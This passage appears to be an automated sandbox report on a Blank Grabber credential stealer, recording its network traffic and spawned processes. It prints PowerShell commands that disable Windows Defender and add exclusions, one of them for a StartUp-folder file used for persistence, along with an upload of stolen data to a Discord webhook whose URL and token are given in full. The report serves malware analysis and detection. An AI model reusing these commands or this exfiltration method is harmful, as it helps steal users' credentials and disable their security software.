                                                          May 23, 2024 01:36:56.108144045 CEST53637921.1.1.1192.168.2.9

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          May 23, 2024 01:36:49.166210890 CEST192.168.2.91.1.1.10x3c0aStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                          May 23, 2024 01:36:49.894299030 CEST192.168.2.91.1.1.10xcb63Standard query (0)discord.comA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          May 23, 2024 01:36:49.174890995 CEST1.1.1.1192.168.2.90x3c0aNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                          May 23, 2024 01:36:49.901182890 CEST1.1.1.1192.168.2.90xcb63No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                          May 23, 2024 01:36:49.901182890 CEST1.1.1.1192.168.2.90xcb63No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                          May 23, 2024 01:36:49.901182890 CEST1.1.1.1192.168.2.90xcb63No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                          May 23, 2024 01:36:49.901182890 CEST1.1.1.1192.168.2.90xcb63No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                          May 23, 2024 01:36:49.901182890 CEST1.1.1.1192.168.2.90xcb63No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • discord.com
                                                          • ip-api.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.949714208.95.112.1807656C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 01:36:49.181269884 CEST116OUTGET /json/?fields=225545 HTTP/1.1
                                                          Host: ip-api.com
                                                          Accept-Encoding: identity
                                                          User-Agent: python-urllib3/2.2.1
                                                          May 23, 2024 01:36:49.702807903 CEST381INHTTP/1.1 200 OK
                                                          Date: Wed, 22 May 2024 23:36:49 GMT
                                                          Content-Type: application/json; charset=utf-8
                                                          Content-Length: 204
                                                          Access-Control-Allow-Origin: *
                                                          X-Ttl: 60
                                                          X-Rl: 44
                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 37 35 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 7d
                                                          Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-175.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.175"}


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.949715162.159.135.2324437656C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-22 23:36:50 UTC302OUTPOST /api/webhooks/1220929699618750534/zhSTomvYGhmMHwb8qcNrPuGLmzvJ7OZ0dj098Ewa_79bqm5nvJ2v6LXEGk7f3ADrpknC HTTP/1.1
                                                          Host: discord.com
                                                          Accept-Encoding: identity
                                                          Content-Length: 757061
                                                          User-Agent: python-urllib3/2.2.1
                                                          Content-Type: multipart/form-data; boundary=7aed04c08861a53965fd837c5996aad0
                                                          2024-05-22 23:36:50 UTC16384OUTData Raw: 2d 2d 37 61 65 64 30 34 63 30 38 38 36 31 61 35 33 39 36 35 66 64 38 33 37 63 35 39 39 36 61 61 64 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 74 69 6e 61 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 62 68 53 bd 21 04 00 00 01 0f be 58 82 47 28 22 c7 12 1f 8d 0b 77 25 41 8e 5f 08 9e de ca e2 e7 31 13 50 10 ef e4 cf 92 f4 18 09 cd e4 f6 e3 8d 5f b1 02 e7 53 a8 68 d5 fd 76 ad 04 f1 cc 9a ba 7b e2 3d 02 23 73 f3 25 04 8e c0 1d c4 32 91 b1 59 4a a4 05 e1 19 c0 95 0c f1 5b 7b 5b 08 be fd 20
                                                          Data Ascii: --7aed04c08861a53965fd837c5996aad0Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!bhS!XG("w%A_1P_Shv{=#s%2YJ[{[
                                                          2024-05-22 23:36:50 UTC16384OUTData Raw: 0f 9e 88 72 4e 8f bb a0 5d 01 5f f6 61 9c 01 76 4b a1 0b 1f 9a 7d d9 0f 17 54 0c 4d 69 be 88 18 4a 06 9e 3a bc 51 c8 4a 09 8e f5 f4 ff 8d ee e9 bc a0 d5 7f 86 32 52 3e 78 72 4d b8 b8 a7 4e 1b 95 69 2d e3 92 fe 42 2e 0b a1 00 fa ff 76 d3 58 32 41 f2 df ae cf 7a 39 e2 9a c6 f6 fa 44 35 7c 29 2f 62 54 34 63 d1 35 53 37 4f 60 f2 dd 16 05 72 7f a7 4a 47 89 7f 03 08 fc 4d 83 7b f2 22 2d 68 ff 96 3d 44 94 e8 ae 6b 92 25 3c c7 ae 40 b7 46 98 f0 b6 2f 0f a8 5a 98 9c 85 9d 9c 7e 82 9d 9b 49 20 d9 ee ee ce 83 69 c6 42 bc f4 8e c5 4a b1 bc 54 a0 a0 15 aa 52 fb 5e af 04 4d 2c dc 55 f4 85 4a 0b f3 f4 64 f3 35 78 47 1d 56 35 9d fa 25 57 20 a6 c8 f0 86 ab 83 03 be 76 45 b8 11 86 cd 9e ae 49 b0 00 08 31 fa 3f 53 93 bf 67 f9 8d 5f 76 41 96 c0 d5 70 86 54 21 3a 49 0f c4 e0
                                                          Data Ascii: rN]_avK}TMiJ:QJ2R>xrMNi-B.vX2Az9D5|)/bT4c5S7O`rJGM{"-h=Dk%<@F/Z~I iBJTR^M,UJd5xGV5%W vEI1?Sg_vApT!:I
                                                          2024-05-22 23:36:50 UTC16384OUTData Raw: 8f c8 db bc ee fa f2 64 78 7e ab 42 88 87 79 95 2e a7 73 96 0f 40 19 1c 99 2e 81 ef 04 f7 1e ee e9 3d b5 94 4d ac 1c 86 33 d4 0a df 10 43 4a db b1 db e2 af f3 72 0d bc 18 d0 78 93 e7 63 83 7a ea 97 bd 61 02 80 97 a5 12 c6 68 2f 7c 8c e7 0c 7f 29 86 25 09 40 fe 99 f7 49 f0 2c 08 fd b5 98 18 b2 d1 b0 e3 8e 3d b9 50 32 68 ce c2 d0 36 6a 8a 53 e5 95 4a 26 ba e4 1f 37 f2 c4 48 b4 74 2c 04 b4 4a 29 a4 00 9c 45 7a 0d 94 20 37 29 d5 1e cd d3 12 9f 84 ca 69 40 e9 a6 52 a0 85 7b de 84 24 f0 08 8c 29 dd ec a4 b4 ba 57 e4 93 12 f8 61 99 04 de 7f 03 93 51 dd 97 11 ff 20 3d 68 de d8 5c ca b9 58 8c ec 75 c4 ec df d5 cc 51 a8 fc d6 d4 bf 1f 84 bc 9b 1a 4e 02 ef 4c b8 b4 25 3b 69 4b 9d 56 d3 6d e7 e2 69 3c 18 46 5d 53 8e d3 77 db 6a 7d 1f 91 e3 20 06 ec e8 b9 94 1b c7 58
                                                          Data Ascii: dx~By.s@.=M3CJrxczah/|)%@I,=P2h6jSJ&7Ht,J)Ez 7)i@R{$)WaQ =h\XuQNL%;iKVmi<F]Swj} X
                                                          2024-05-22 23:36:50 UTC16384OUTData Raw: 67 83 f7 18 4b 02 26 0c 92 74 00 a8 b2 61 b3 81 6d f9 7f ce 2d 5a f4 d7 0a db 3c b4 0b 97 2d ac 98 fd 51 02 d6 4e 07 05 99 3b ab 30 12 62 85 a6 d2 78 bd 7e 1c 2d 4b 5a 5d ee c5 d2 a0 f3 ed 6a 6a a9 a9 96 47 1b 89 8b 19 45 e1 65 b2 4a 43 3e 0d 9c 77 a5 f3 7a 06 02 b9 2a c2 2c ce 0a c8 ca bf a7 3a c8 43 bb d0 ee 1d 6a 66 b5 59 dc 9e d1 90 1f f9 33 3f 5a 4b b0 e8 fb d6 8c 5e 80 24 1a 75 19 60 b4 b7 35 fe 2b 97 37 fb e3 03 17 0e 69 92 5a b3 d4 59 9e cf ae b3 1b 6c d8 7e 11 93 13 2e 6e 78 92 e7 2d 31 30 df 6e ea 5b f4 59 04 fb 1c 8b 16 ce 59 89 51 1f aa 20 79 45 5f 7a b1 74 d0 4f ef d0 97 2a bd 78 59 60 7f 5f ab 9a 6b 91 9c 79 31 ae 36 45 70 53 9f 2b db 01 e3 d7 f8 72 fe f7 b6 37 f6 c3 37 f3 ee 6d c5 4a 39 fe 5b 80 1a c6 0b 56 c8 bb 8c 0b c4 f5 5a 17 76 4d b6
                                                          Data Ascii: gK&tam-Z<-QN;0bx~-KZ]jjGEeJC>wz*,:CjfY3?ZK^$u`5+7iZYl~.nx-10n[YYQ yE_ztO*xY`_ky16EpS+r77mJ9[VZvM
                                                          2024-05-22 23:36:50 UTC16384OUTData Raw: 52 f9 58 d0 5c 37 1c 53 8f 67 07 91 e3 f0 95 9e a9 9d 27 80 b6 63 50 f6 fa 21 af b1 1d 90 1d 5c 6c 9b 77 3b f4 81 a3 f4 18 07 2b 9a f3 55 26 81 7b 51 60 ff 33 b2 0b 4f bf 0e 79 60 bd 8b 77 89 c8 e1 e0 f4 35 a2 83 a6 a5 94 0f 45 f2 ea 85 5e 39 7d f1 cc 4b a2 df e5 21 c5 59 5c 58 dc 55 4f f2 17 55 f0 3e d6 47 7c 6c 7f f4 e3 5a f1 d6 44 93 b7 5d d4 ad 67 c9 6d f7 14 b9 5e 97 79 70 bf 3f f9 3c b5 78 6f 34 e8 0a 6f 9e 80 c2 2f 6c 19 d3 fb a1 62 d3 63 e7 ae 01 78 a6 45 20 1d 70 91 0e 3d e7 4f ae 93 53 e0 74 8d e0 73 6a 3c 4f e9 7f d6 b8 fc fa 30 00 2d b7 bc 79 e9 83 15 8b 29 32 d7 55 00 ca e0 f2 2f 03 8a 47 3a 89 4d 92 ec ee 00 35 16 36 6b 7b ed ed 49 6d ef 87 ba ed 88 64 75 3c c9 4a cf 68 74 c3 db 37 07 4a d0 4c da ee c7 f9 88 3c ea a3 ec ce 82 f4 d6 5d 8c 75
                                                          Data Ascii: RX\7Sg'cP!\lw;+U&{Q`3Oy`w5E^9}K!Y\XUOU>G|lZD]gm^yp?<xo4o/lbcxE p=OStsj<O0-y)2U/G:M56k{Imdu<Jht7JL<]u
                                                          2024-05-22 23:36:50 UTC16384OUTData Raw: c7 10 1b 8d 87 62 81 18 7c 48 8d 53 a8 d8 fc a4 80 51 63 0a 66 7d ab 27 cd d4 5b 09 40 4f ea 02 63 33 96 ea b4 a2 57 ed 82 94 31 d3 8b 04 c3 60 e6 54 94 dd b3 7e 0f a0 05 d3 76 55 a8 cb 6c a6 85 d5 de ad 31 b7 1e ec a7 0f 36 81 62 bf 53 5b 85 95 44 df db 8d 8e 98 52 93 8a 5e c8 54 c0 6c fc 0a 1b cd 7c 9f 1c 56 4f 11 ac 99 d1 3f 19 3a e5 bd 81 29 d0 f0 1e 00 0e aa 79 d5 e2 ee a6 0c 8a 9a 5c 71 f8 f7 09 17 31 fe 72 e8 5b 69 03 56 1d 25 b9 0c 98 7d 27 00 01 14 41 6a bc eb b1 e1 05 91 ec 81 b7 3c 67 4f a3 11 a3 39 9e 17 54 9d 9f ad 15 90 10 90 45 20 c8 5d 61 dc 6a 2b 6d 6e 2e 8e ef 01 9c 58 b6 0d 09 15 ed 6c 5a 36 47 b7 6a 93 eb b7 59 06 26 e0 1d 75 18 89 ab d0 fb b1 2f 33 51 1a cd d6 52 a3 24 7f 10 ae d8 3d ee 9b 71 ea 7e 07 85 af ba d1 56 47 c4 11 43 c5 a5
                                                          Data Ascii: b|HSQcf}'[@Oc3W1`T~vUl16bS[DR^Tl|VO?:)y\q1r[iV%}'Aj<gO9TE ]aj+mn.XlZ6GjY&u/3QR$=q~VGC
                                                          2024-05-22 23:36:50 UTC16384OUTData Raw: 66 eb 36 8d 36 d6 a7 c2 33 96 46 ab 57 00 7d 39 4c 2d 05 53 ec f6 c6 0a a2 ab 0e 26 12 59 17 42 3e cb 6c d2 d7 44 44 04 c9 09 dc d6 b8 5f c0 a5 51 08 42 54 21 c3 54 d4 86 6a 9f b9 f3 34 ed fe 39 4b d7 fd 42 2d fc cc 4c 40 02 72 c3 24 e1 91 d1 56 6a a7 12 84 cf 94 50 c9 71 4f 8b bc a2 f4 c9 ed 33 f8 8c 2f 9c 5d 40 2d 1b bb d2 83 59 f3 59 08 4a 66 8c b8 98 aa 58 f9 f8 0f 51 2a 59 da c4 e1 bd a7 eb 2a 9b b3 cb 4b c4 7c be 01 f1 e8 a6 e1 dc 71 52 4b 01 82 71 e0 8e 9c 6f c4 0f 67 82 3d 07 3f 74 90 08 16 b5 e7 f1 61 11 96 24 f7 5e 09 9d a2 c1 c3 97 f6 9f f6 e0 dc fc ff d7 10 37 f6 4a 49 2e 5a d4 49 16 69 cc 19 e9 28 10 63 f3 c2 20 13 50 6e 4c 36 40 8f 02 40 85 8d a1 fa 9f 1d 26 73 d4 53 22 17 2d 6a be a0 6d 41 46 b2 14 59 b9 bc 0a ee 8a e4 95 76 23 a4 0d 54 52
                                                          Data Ascii: f663FW}9L-S&YB>lDD_QBT!Tj49KB-L@r$VjPqO3/]@-YYJfXQ*Y*K|qRKqog=?ta$^7JI.ZIi(c PnL6@@&sS"-jmAFYv#TR
                                                          2024-05-22 23:36:50 UTC16384OUTData Raw: e8 5d b3 80 04 49 61 6e 1a 8b ef 5b df f9 5d f1 35 53 88 21 e1 71 9c 2b d5 98 d7 80 c1 fa 8b 18 86 2e 75 a7 cb dc 8e 42 cf 2e 74 00 65 a4 c0 7c b4 c2 89 e6 17 82 65 10 c7 e3 d0 56 74 75 4e 37 2c d9 63 77 06 a5 a0 1b 40 37 5f 26 81 c9 8e 13 5b 57 78 e4 27 61 52 88 8c 18 fc 65 56 3d 3f 83 44 a7 1e 6b be 91 14 96 72 11 a3 e3 29 71 09 f1 1b 38 ae 0f 4b 3e a9 2f 76 df 79 18 23 96 34 42 95 b4 ad ce 17 27 ce 1d 45 44 6f 42 49 47 50 94 cb 99 08 d1 bb 68 15 8e 7a a0 22 24 3e 3c 10 7a a7 71 b0 d2 1a 63 ae 73 0e 1a fe 33 f7 1d c2 97 d3 a9 18 44 f4 2d df c6 89 98 0b 23 e3 1b e6 06 57 15 d1 ae 04 8e 60 95 0c 72 01 fb d9 ee e5 01 9c d3 b2 fd ae ef 34 5a da 1c 9b 60 79 d1 21 77 36 75 e6 b4 88 26 18 ca ec d5 16 85 15 c4 db 72 8d bc 5a 00 a9 8f 57 ed 3b 0f ed 8a 1d 37 f1
                                                          Data Ascii: ]Ian[]5S!q+.uB.te|eVtuN7,cw@7_&[Wx'aReV=?Dkr)q8K>/vy#4B'EDoBIGPhz"$><zqcs3D-#W`r4Z`y!w6u&rZW;7
                                                          2024-05-22 23:36:50 UTC16384OUTData Raw: d5 69 03 93 ac 41 8a 4b 9c 42 49 3e 4b bd 34 fd f4 96 33 58 84 28 c3 c6 36 93 6e 64 6a e5 6a 9f ae cc 01 53 6c cc 5f 17 f9 2c 7b 5d f3 39 22 7d 21 28 95 d2 21 2a 0c 1e 0d c8 a6 07 dc 7d 0c 5a 23 ac 73 97 ce ed c2 df 3b 85 ed 86 7f 2f 44 a6 3b a1 a7 e6 4b f9 63 1f 5a db 1f ba 21 82 a3 67 a9 7b 0d 36 8c 79 b3 b8 70 eb 2b a4 eb 9b b9 04 54 92 41 8b 75 c8 1f 5d a3 41 0f 20 cb 05 0e be d6 c9 f4 8e 21 78 aa 77 8c 13 06 d4 ca a8 02 a2 3a 60 58 11 ce 30 f5 83 2b 47 0a 77 d0 33 f7 6f 99 d7 82 83 38 cd e4 80 5b 4a 4d c5 8c 53 9a 55 d8 51 1f 4f 82 bb 48 25 ae 0b 30 0b 92 b8 10 e1 0a 64 cd b7 82 20 dc 9d 9c 4b 7c 2a d1 5d e3 09 53 74 82 fc f8 68 c7 e5 e9 e5 89 bc 73 df d5 31 b6 bc 83 48 b3 80 58 33 37 4c f1 be b7 bc c6 17 ca 01 dd ed 9b 97 0a 53 e7 39 ec b2 91 79 92
                                                          Data Ascii: iAKBI>K43X(6ndjjSl_,{]9"}!(!*}Z#s;/D;KcZ!g{6yp+TAu]A !xw:`X0+Gw3o8[JMSUQOH%0d K|*]Sths1HX37LS9y
                                                          2024-05-22 23:36:50 UTC16384OUTData Raw: e6 24 86 7b b5 ba c5 95 2e 4e 7e d1 89 c7 41 25 81 69 4a 99 0e 97 9f da 8e 15 c3 d6 15 aa ef 89 c8 83 3f 24 50 89 11 fb dd 15 00 63 6f 24 fb 3b 89 64 90 fd 34 7e bf 11 5b 6b 2f 65 7f 4f 42 f0 3b 33 49 d2 3d b3 7e 02 4e 00 36 58 9b c0 38 69 e0 12 1d e3 30 38 42 40 d2 74 9d 15 bf 0e b8 97 e3 b1 92 31 44 24 c5 96 50 1c 9b a8 b0 11 9d 6e 78 8d 77 28 81 7d 5d 0e cd b9 fc 46 c3 a9 53 63 6a b5 e8 7a ba cf 1a f4 39 72 0c 62 5a cd 2a 42 8f 54 ce 25 fe 9c 7b a0 de dc a4 fc 44 5e e0 47 8e e8 20 64 66 4a 84 22 e8 5f db 1d cb 8b 44 cb e1 72 a1 bd 2e 65 ee dc d0 3a 0a 53 d8 4b 77 40 fa 2d 4a 53 2a 8f cc 93 93 be 17 de e5 51 82 60 b2 ce db d4 15 8f f5 85 d3 7e 72 84 9c 2a d5 85 d4 a4 58 5f 8d d0 df 15 30 80 70 07 d3 2c 46 b9 4a 82 10 7d f4 32 09 47 1e c7 2f 1d 38 40 20
                                                          Data Ascii: ${.N~A%iJ?$Pco$;d4~[k/eOB;3I=~N6X8i08B@t1D$Pnxw(}]FScjz9rbZ*BT%{D^G dfJ"_Dr.e:SKw@-JS*Q`~r*X_0p,FJ}2G/8@
                                                          2024-05-22 23:36:51 UTC1365INHTTP/1.1 404 Not Found
                                                          Date: Wed, 22 May 2024 23:36:51 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 45
                                                          Connection: close
                                                          set-cookie: __dcfduid=29fc2f58189411efae87a23f64d7541c; Expires=Mon, 21-May-2029 23:36:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                          x-ratelimit-limit: 5
                                                          x-ratelimit-remaining: 4
                                                          x-ratelimit-reset: 1716421012
                                                          x-ratelimit-reset-after: 1
                                                          via: 1.1 google
                                                          alt-svc: h3=":443"; ma=86400
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2BmkMsbaobPUsvbErmh97aDuEbCzYd7k84OocZ%2BABWTU%2FBBDfv9pr9df88oAyPVoigjlE1Vd3yJ5zGGCJjNugcLyJuaxVg2cilH5uYbmSDjy1xFQnYWf8lDmUz4q"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          X-Content-Type-Options: nosniff
                                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                          Set-Cookie: __sdcfduid=29fc2f58189411efae87a23f64d7541c1ac8b801464fa2929075f1c32ed0b4d0638c0aa645c12adb8bb849f0d67dfc05; Expires=Mon, 21-May-2029 23:36:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                          Set-Cookie: __cfruid=a3b0507fedfc396abe2f4a23c0c33288c6dc829f-1716421011; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:19:36:06
                                                          Start date:22/05/2024
                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe"
                                                          Imagebase:0x7ff7b10f0000
                                                          File size:7'266'369 bytes
                                                          MD5 hash:030C3C535B2D8F10CEAEEDE6E3FE23F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1329466434.00000162E122B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1329466434.00000162E1229000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:19:36:07
                                                          Start date:22/05/2024
                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe"
                                                          Imagebase:0x7ff7b10f0000
                                                          File size:7'266'369 bytes
                                                          MD5 hash:030C3C535B2D8F10CEAEEDE6E3FE23F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1760965599.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1762531034.00000161970DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1757718097.000001619762A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1759071926.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.1765429469.00000161970E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:19:36:09
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:19:36:09
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:19:36:09
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:19:36:09
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:19:36:09
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:19:36:09
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:19:36:10
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:19:36:10
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:19:36:10
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
